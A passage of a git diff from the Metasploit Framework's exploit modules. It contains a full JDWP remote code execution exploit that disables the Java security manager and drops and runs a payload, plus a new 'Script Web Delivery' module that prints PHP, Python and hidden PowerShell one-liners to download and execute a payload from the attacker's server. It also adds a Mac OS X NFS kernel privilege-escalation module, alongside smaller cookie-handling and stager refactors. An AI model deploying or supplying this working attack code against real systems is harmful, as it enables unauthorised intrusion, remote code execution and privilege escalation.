+    unless target_class
+      fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found")
+    end
+
+    get_methods(target_class["reftype_id"])
+    target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
+    unless target_method
+      fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found")
+    end
+
+    return target_class, target_method
+  end
+
+  # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept")
+  def str_to_fq_class(s)
+    i = s.rindex(".")
+    unless i
+      fail_with(Failure::BadConfig, 'Bad defined break class')
+    end
+
+    method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string
+
+    classname = 'L'
+    classname << s[0..i-1].gsub(/[.]/, '/')
+    classname << ';'
+
+    return classname, method
+  end
+
+  # Gets the status of a given thread
+  def thread_status(thread_id)
+    sock.put(create_packet(THREADSTATUS_SIG, format(@vars["objectid_size"], thread_id)))
+    buf = read_reply(datastore['BREAK_TIMEOUT'])
+    unless buf
+      fail_with(Exploit::Failure::Unknown, "No network response")
+    end
+    status, suspend_status = buf.unpack('NN')
+
+    status
+  end
+
+  # Resumes execution of the application or thread after the suspend command or an event has stopped it
+  def resume_vm(thread_id = nil)
+    if thread_id.nil?
+      sock.put(create_packet(RESUMEVM_SIG))
+    else
+      sock.put(create_packet(THREADRESUME_SIG, format(@vars["objectid_size"], thread_id)))
+    end
+
+    response = read_reply(datastore['BREAK_TIMEOUT'])
+    unless response
+      fail_with(Exploit::Failure::Unknown, "No network response")
+    end
+
+    response
+  end
+
+  # Suspend execution of the application or thread
+  def suspend_vm(thread_id = nil)
+    if thread_id.nil?
+      sock.put(create_packet(SUSPENDVM_SIG))
+    else
+      sock.put(create_packet(THREADSUSPEND_SIG, format(@vars["objectid_size"], thread_id)))
+    end
+
+    response = read_reply
+    unless response
+      fail_with(Exploit::Failure::Unknown, "No network response")
+    end
+
+    response
+  end
+
+  # Sets an event request. When the event described by this request occurs, an event is sent from the target VM
+  def send_event(event_code, args)
+    data = [event_code].pack('C')
+    data << [SUSPEND_ALL].pack('C')
+    data << [args.length].pack('N')
+
+    args.each do |kind,option|
+      data << [kind].pack('C')
+      data << option
+    end
+
+    sock.put(create_packet(EVENTSET_SIG, data))
+    response = read_reply
+    unless response
+      fail_with(Exploit::Failure::Unknown, "#{peer} - No network response")
+    end
+    return response.unpack('N')[0]
+  end
+
+  # Parses a received event and compares it with the expected
+  def parse_event(buf, event_id, thread_id)
+    len = @vars["objectid_size"]
+    return false if buf.length < 10 + len - 1
+
+    r_id = buf[6..9].unpack('N')[0]
+    t_id = unformat(len,buf[10..10+len-1])
+
+    return (event_id == r_id) && (thread_id == t_id)
+  end
+
+  # Clear a defined event request
+  def clear_event(event_code, r_id)
+    data = [event_code].pack('C')
+    data << [r_id].pack('N')
+    sock.put(create_packet(EVENTCLEAR_SIG, data))
+    read_reply
+  end
+
+  # Invokes a static method. The method must be member of the class type or one of its superclasses,
+  # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private
+  # methods can be invoked.
+  def invoke_static(class_id, thread_id, meth_id, args = [])
+    data = format(@vars["referencetypeid_size"], class_id)
+    data << format(@vars["objectid_size"], thread_id)
+    data << format(@vars["methodid_size"], meth_id)
+    data << [args.length].pack('N')
+
+    args.each do |arg|
+      data << arg
+      data << [0].pack('N')
+    end
+
+    sock.put(create_packet(INVOKESTATICMETHOD_SIG, data))
+    buf = read_reply
+    buf
+  end
+
+  # Invokes a instance method. The method must be member of the object's type or one of its superclasses,
+  # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods
+  # can be invoked.
+  def invoke(obj_id, thread_id, class_id, meth_id, args = [])
+    data = format(@vars["objectid_size"], obj_id)
+    data << format(@vars["objectid_size"], thread_id)
+    data << format(@vars["referencetypeid_size"], class_id)
+    data << format(@vars["methodid_size"], meth_id)
+    data << [args.length].pack('N')
+
+    args.each do |arg|
+      data << arg
+      data << [0].pack('N')
+    end
+
+    sock.put(create_packet(INVOKEMETHOD_SIG, data))
+    buf = read_reply
+    buf
+  end
+
+  # Creates a new object of specified class, invoking the specified constructor. The constructor
+  # method ID must be a member of the class type.
+  def create_instance(class_id, thread_id, meth_id, args = [])
+    data = format(@vars["referencetypeid_size"], class_id)
+    data << format(@vars["objectid_size"], thread_id)
+    data << format(@vars["methodid_size"], meth_id)
+    data << [args.length].pack('N')
+
+    args.each do |arg|
+      data << arg
+      data << [0].pack('N')
+    end
+
+    sock.put(create_packet(CREATENEWINSTANCE_SIG, data))
+    buf = read_reply
+    buf
+  end
+
+  def temp_path
+    return nil unless datastore['TMP_PATH']
+    unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
+      fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')
+    end
+    datastore['TMP_PATH']
+  end
+
+  # Configures payload according to targeted architecture
+  def setup_payload
+    # 1. Setting up generic values.
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
+    pl_exe = generate_payload_exe
+
+    # 2. Setting up arch specific...
+    case target['Platform']
+    when 'linux'
+      path = temp_path || '/tmp/'
+      payload_exe = "#{path}#{payload_exe}"
+      if @os.downcase =~ /win/
+        print_warning("#{peer} - #{@os} system detected but using Linux target...")
+      end
+    when 'win'
+      path = temp_path || './'
+      payload_exe = "#{path}#{payload_exe}.exe"
+      unless @os.downcase =~ /win/
+        print_warning("#{peer} - #{@os} system detected but using Windows target...")
+      end
+    end
+
+    return payload_exe, pl_exe
+  end
+
+  # Invokes java.lang.System.getProperty() for OS fingerprinting purposes
+  def fingerprint_os(thread_id)
+    size = @vars["objectid_size"]
+
+    # 1. Creates a string on target VM with the property to be getted
+    cmd_obj_ids = create_string("os.name")
+    fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0
+    cmd_obj_id = cmd_obj_ids[0]["obj_id"]
+
+    # 2. Gets property
+    data = [TAG_OBJECT].pack('C')
+    data << format(size, cmd_obj_id)
+    data_array = [data]
+    runtime_class , runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty")
+    buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
+    fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C')
+
+    str = unformat(size, buf[1..1+size-1])
+    @os = solve_string(format(@vars["objectid_size"],str))
+  end
+
+  # Creates a file on the server given a execution thread
+  def create_file(thread_id, filename)
+    cmd_obj_ids = create_string(filename)
+    fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0
+
+    cmd_obj_id = cmd_obj_ids[0]["obj_id"]
+    size = @vars["objectid_size"]
+    data = [TAG_OBJECT].pack('C')
+    data << format(size, cmd_obj_id)
+    data_array = [data]
+    runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V")
+    buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
+    fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')
+
+    file = unformat(size, buf[1..1+size-1])
+    fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0)
+
+    register_files_for_cleanup(filename)
+
+    file
+  end
+
+  # Stores the payload on a new string created in target VM
+  def upload_payload(thread_id, pl_exe)
+    size = @vars["objectid_size"]
+    if is_java_eight
+      runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64;", "getDecoder")
+      buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+    else
+      runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>")
+      buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+    end
+    unless buf[0] == [TAG_OBJECT].pack('C')
+      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
+    end
+
+    decoder = unformat(size, buf[1..1+size-1])
+    if decoder.nil? || decoder == 0
+      fail_with(Failure::Unknown, "Failed to create Base64 decoder object")
+    end
+
+    cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}")
+    if cmd_obj_ids.length == 0
+      fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
+    end
+
+    cmd_obj_id = cmd_obj_ids[0]["obj_id"]
+    data = [TAG_OBJECT].pack('C')
+    data << format(size, cmd_obj_id)
+    data_array = [data]
+
+    if is_java_eight
+      runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64$Decoder;", "decode", "(Ljava/lang/String;)[B")
+    else
+      runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
+    end
+    buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
+    unless buf[0] == [TAG_ARRAY].pack('C')
+      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray")
+    end
+
+    pl = unformat(size, buf[1..1+size-1])
+    pl
+  end
+
+  # Dumps the payload on a opened server file given a execution thread
+  def dump_payload(thread_id, file, pl)
+    size = @vars["objectid_size"]
+    data = [TAG_OBJECT].pack('C')
+    data << format(size, pl)
+    data_array = [data]
+    runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V")
+    buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
+    unless buf[0] == [TAG_VOID].pack('C')
+      fail_with(Failure::Unknown, "Exception while writing to file")
+    end
+  end
+
+  # Closes a file on the server given a execution thread
+  def close_file(thread_id, file)
+    runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close")
+    buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"])
+    unless buf[0] == [TAG_VOID].pack('C')
+      fail_with(Failure::Unknown, "Exception while closing file")
+    end
+  end
+
+  # Executes a system command on target VM making use of java.lang.Runtime.exec()
+  def execute_command(thread_id, cmd)
+    size = @vars["objectid_size"]
+
+    # 1. Creates a string on target VM with the command to be executed
+    cmd_obj_ids = create_string(cmd)
+    if cmd_obj_ids.length == 0
+      fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
+    end
+
+    cmd_obj_id = cmd_obj_ids[0]["obj_id"]
+
+    # 2. Gets Runtime context
+    runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime")
+    buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+    unless buf[0] == [TAG_OBJECT].pack('C')
+      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
+    end
+
+    rt = unformat(size, buf[1..1+size-1])
+    if rt.nil? || (rt == 0)
+      fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()")
+    end
+
+    # 3. Finds and executes "exec" method supplying the string with the command
+    exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
+    if exec_meth.nil?
+      fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()")
+    end
+
+    data = [TAG_OBJECT].pack('C')
+    data << format(size, cmd_obj_id)
+    data_array = [data]
+    buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array)
+    unless buf[0] == [TAG_OBJECT].pack('C')
+      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
+    end
+  end
+
+  # Set event for stepping into a running thread
+  def set_step_event
+    # 1. Select a thread in sleeping status
+    t_id = nil
+    @threads.each_key do |thread|
+      if thread_status(thread) == THREAD_SLEEPING_STATUS
+        t_id = thread
+        break
+      end
+    end
+    fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil?
+
+    # 2. Suspend the VM before setting the event
+    suspend_vm
+
+    vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}")
+    step_info = format(@vars["objectid_size"], t_id)
+    step_info << [STEP_MIN].pack('N')
+    step_info << [STEP_INTO].pack('N')
+    data = [[MODKIND_STEP, step_info]]
+
+    r_id = send_event(EVENT_STEP, data)
+    unless r_id
+      fail_with(Failure::Unknown, "Could not set the event")
+    end
+
+    return r_id, t_id
+  end
+
+  # Disables security manager if it's set on target JVM
+  def disable_sec_manager
+    sys_class = get_class_by_name("Ljava/lang/System;")
+
+    fields = get_fields(sys_class["reftype_id"])
+
+    sec_field = nil
+
+    fields.each do |field|
+      sec_field = field["field_id"] if field["name"].downcase == "security"
+    end
+
+    fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil?
+
+    value = get_value(sys_class["reftype_id"], sec_field)
+
+    if(value == 0)
+      print_good("#{peer} - Security manager was not set")
+    else
+      set_value(sys_class["reftype_id"], sec_field, 0)
+      if get_value(sys_class["reftype_id"], sec_field) == 0
+        print_good("#{peer} - Security manager has been disabled")
+      else
+        print_good("#{peer} - Security manager has not been disabled, trying anyway...")
+      end
+    end
+  end
+
+  # Uploads & executes the payload on the target VM
+  def exec_payload(thread_id)
+    # 0. Fingerprinting OS
+    fingerprint_os(thread_id)
+
+    vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}")
+
+    # 1. Prepares the payload
+    payload_exe, pl_exe = setup_payload
+
+    # 2. Creates file on server for dumping payload
+    file = create_file(thread_id, payload_exe)
+
+    # 3. Uploads payload to the server
+    pl = upload_payload(thread_id, pl_exe)
+
+    # 4. Dumps uploaded payload into file on the server
+    dump_payload(thread_id, file, pl)
+
+    # 5. Closes the file on the server
+    close_file(thread_id, file)
+
+    # 5b. When linux arch, give execution permissions to file
+    if target['Platform'] == 'linux'
+      cmd = "chmod +x #{payload_exe}"
+      execute_command(thread_id, cmd)
+    end
+
+    # 6. Executes the dumped payload
+    cmd = "#{payload_exe}"
+    execute_command(thread_id, cmd)
+  end
+
+
+  def exploit
+    @my_id = 0x01
+    @vars = {}
+    @classes = []
+    @methods = {}
+    @threads = {}
+    @os = nil
+
+    connect
+
+    unless handshake == HANDSHAKE
+      fail_with(Failure::NotVulnerable, "JDWP Protocol not found")
+    end
+
+    print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...")
+    get_sizes
+
+    print_status("#{peer} - Getting the version of the target VM...")
+    get_version
+
+    print_status("#{peer} - Getting all currently loaded classes by the target VM...")
+    get_all_classes
+
+    print_status("#{peer} - Getting all running threads in the target VM...")
+    get_all_threads
+
+    print_status("#{peer} - Setting 'step into' event...")
+    r_id, t_id = set_step_event
+
+    print_status("#{peer} - Resuming VM and waiting for an event...")
+    response = resume_vm
+
+    unless parse_event(response, r_id, t_id)
+      datastore['NUM_RETRIES'].times do |i|
+        print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...")
+        buf = read_reply
+        break if parse_event(buf, r_id, t_id)
+
+        if i == datastore['NUM_RETRIES']
+          fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts")
+        end
+      end
+    end
+
+    vprint_status("#{peer} - Received matching event from thread #{t_id}")
+    print_status("#{peer} - Deleting step event...")
+    clear_event(EVENT_STEP, r_id)
+
+    print_status("#{peer} - Disabling security manager if set...")
+    disable_sec_manager
+
+    print_status("#{peer} - Dropping and executing payload...")
+    exec_payload(t_id)
+
+    disconnect
+  end
+end
diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
index b18a55f292..7606159005 100644
--- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
+++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
@@ -34,8 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         =>
         [
           'hdm',                                        # module development
-          'GML <grandmasterlogic [at] gmail.com>',      # module development and debugging
-          'Stefan Esser <sesser [at] hardened-php.net>' # discovered, patched, exploited
+          'GML <grandmasterlogic[at]gmail.com>',      # module development and debugging
+          'Stefan Esser <sesser[at]hardened-php.net>' # discovered, patched, exploited
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # Detect the phpBB cookie name
-    if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/)
+    if res.get_cookies =~ /(.*)_(sid|data)=/
       vprint_status("The server may require a cookie name of '#{$1}_data'")
     end
 
diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
index 8a7ac17992..d845ce36ef 100644
--- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
+++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
@@ -12,7 +12,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
@@ -56,7 +56,8 @@ class Metasploit4 < Msf::Exploit::Remote
           [ 'Windows Universal',
             {
               'Arch' => ARCH_X86,
-              'Platform' => 'win'
+              'Platform' => 'win',
+              'CmdStagerFlavor' => 'vbs'
             },
           ],
         ],
diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb
index a5a73f8f3e..85ed24179a 100644
--- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb
+++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb
@@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   Rank = GreatRanking
 
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpClient
 
@@ -66,7 +66,8 @@ class Metasploit4 < Msf::Exploit::Remote
         [ 'Windows x64',
           {
             'Arch' => ARCH_X86_64,
-            'Platform' => 'win'
+            'Platform' => 'win',
+            'CmdStagerFlavor' => 'vbs'
           }
         ]
       ],
diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb
index 2b32642ace..e0b7025f3f 100644
--- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb
+++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb
@@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   Rank = GreatRanking
 
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpClient
 
@@ -67,7 +67,8 @@ class Metasploit4 < Msf::Exploit::Remote
         [ 'Windows x64',
           {
             'Arch' => ARCH_X86_64,
-            'Platform' => 'win'
+            'Platform' => 'win',
+            'CmdStagerFlavor' => 'vbs'
           }
         ]
       ],
diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
new file mode 100644
index 0000000000..5a94b56a6e
--- /dev/null
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Script Web Delivery',
+      'Description'  => %q{
+        This module quickly fires up a web server that serves a payload.
+        The provided command will start the specified scripting language interpreter and then download and execute the
+        payload. The main purpose of this module is to quickly establish a session on a target
+        machine when the attacker has to manually type in the command himself, e.g. Command Injection,
+        RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
+        write to disk so it is less likely to trigger AV solutions and will allow privilege
+        escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
+        payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
+        x86 payloads on x64 machines.
+      },
+      'License'      => MSF_LICENSE,
+      'Author'       =>
+        [
+          'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
+          'Ben Campbell',
+          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
+        ],
+      'DefaultOptions' =>
+        {
+          'Payload'    => 'python/meterpreter/reverse_tcp'
+        },
+      'References'     =>
+        [
+          [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
+          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
+        ],
+      'Platform'       => %w{python php win},
+      'Targets'        =>
+        [
+          ['Python', {
+            'Platform' => 'python',
+            'Arch' => ARCH_PYTHON
+          }],
+          ['PHP', {
+            'Platform' => 'php',
+            'Arch' => ARCH_PHP
+          }],
+          ['PSH_x86', {
+            'Platform' => 'win',
+            'Arch' => ARCH_X86
+          }],
+          ['PSH_x64', {
+            'Platform' => 'win',
+            'Arch' => ARCH_X86_64
+          }],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 19 2013'
+    ))
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Delivering Payload")
+    if (target.name.include? "PSH")
+      data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+    else
+      data = %Q|#{payload.encoded} |
+    end
+    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+  end
+
+  def primer
+    url = get_uri()
+    print_status("Run the following command on the target machine:")
+    case target.name
+    when "PHP"
+      print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
+    when "Python"
+      print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+    when "PSH_x86", "PSH_x64"
+      download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+      print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+    end
+  end
+end
diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 027144e742..96f968ce07 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -9,7 +9,7 @@ require 'net/ssh'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
 
-  include Msf::Exploit::CmdStagerBourne
+  include Msf::Exploit::CmdStager
 
   attr_accessor :ssh_socket
 
@@ -46,21 +46,22 @@ class Metasploit3 < Msf::Exploit::Remote
             {
               'Arch' => ARCH_X86,
               'Platform' => 'linux'
-            },
+            }
           ],
           [ 'Linux x64',
             {
               'Arch' => ARCH_X86_64,
               'Platform' => 'linux'
-            },
+            }
           ],
           [ 'OSX x86',
             {
               'Arch' => ARCH_X86,
               'Platform' => 'osx'
-            },
-          ],
+            }
+          ]
         ],
+      'CmdStagerFlavor' => %w{ bourne echo printf },
       'DefaultTarget'  => 0,
       # For the CVE
       'DisclosureDate' => 'Jan 01 1999'
@@ -83,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
+    vprint_status("Executing #{cmd}")
     begin
       Timeout.timeout(3) do
         self.ssh_socket.exec!("#{cmd}\n")
@@ -125,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
 
-    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
+    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
     execute_cmdstager({:linemax => 500})
   end
 end
diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb
new file mode 100644
index 0000000000..1a68c1d0ba
--- /dev/null
+++ b/modules/exploits/osx/local/nfs_mount_root.rb
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Mac OS X NFS Mount Privilege Escalation Exploit',
+      'Description'   => %q{
+        This exploit leverages a stack overflow vulnerability to escalate privileges.
+        The vulnerable function nfs_convert_old_nfs_args does not verify the size
+        of a user-provided argument before copying it to the stack. As a result, by
+        passing a large size as an argument, a local user can overwrite the stack with arbitrary
+        content.
+
+        Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Kenzley Alphonse', # discovery and a very well-written exploit
+          'joev' # msf module
+        ],
+      'References'    =>
+        [
+          [ 'EDB', '32813' ]
+        ],
+      'Platform'      => 'osx',
+      'Arch'          => [ ARCH_X86_64 ],
+      'SessionTypes'  => [ 'shell', 'meterpreter' ],
+      'Targets'       => [
+        [ 'Mac OS X 10.7 Lion x64 (Native Payload)',
+          {
+            'Platform' => 'osx',
+            'Arch' => ARCH_X86_64
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Apr 11 2014'
+    ))
+  end
+
+  def check
+    if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
+    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
+    exploit = File.read(file)
+    pload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+    tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+
+    print_status "Writing temp file as '#{tmpfile}'"
+    write_file(tmpfile, exploit)
+    register_file_for_cleanup(tmpfile)
+
+    print_status "Writing payload file as '#{payloadfile}'"
+    write_file(payloadfile, pload)
+    register_file_for_cleanup(payloadfile)
+
+    print_status "Executing payload..."
+    cmd_exec("chmod +x #{tmpfile}")
+    cmd_exec("chmod +x #{payloadfile}")
+    cmd_exec("#{tmpfile} #{payloadfile}")
+  end
+
+  def xnu_ver
+    m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)
+    m && m[1]
+  end
+
+  def ver_lt(a, b)
+    Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,''))
+  end
+
+end
diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb
index e8fef8bcbc..96d9b28600 100644
--- a/modules/exploits/unix/http/lifesize_room.rb
+++ b/modules/exploits/unix/http/lifesize_room.rb
@@ -56,11 +56,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'    => 'GET',
     }, 10)
 
-    if not (res and res.headers['set-cookie'])
+    if res.nil? || res.get_cookies.empty?
       fail_with(Failure::NotFound, 'Could not obtain a Session ID')
     end
 
-    sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0]
+    sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0]
 
     headers = {
       'Cookie'        => sessionid,
diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb
index 0ac6810817..dc117b6b1a 100644
--- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb
+++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb
@@ -113,4 +113,4 @@ class Metasploit3 < Msf::Exploit::Remote
 
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb
index a5b410086f..4701e7cb72 100644
--- a/modules/exploits/unix/webapp/foswiki_maketext.rb
+++ b/modules/exploits/unix/webapp/foswiki_maketext.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
         }
       })
 
-    if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/
+    if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/
       vprint_status "#{res.code}\n#{res.body}"
       return nil
     end
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_good("validation_key found: #{validation_key}")
 
     if session.empty?
-      if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/
+      if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/
         session = $1
       else
         vprint_error("Error using anonymous access")
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/
+    if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/
       strike_one = $1
     else
       vprint_error("Error getting the FOSWIKISTRIKEONE value")
diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb
index ae6cfbfe69..9fb9ac8969 100644
--- a/modules/exploits/unix/webapp/hastymail_exec.rb
+++ b/modules/exploits/unix/webapp/hastymail_exec.rb
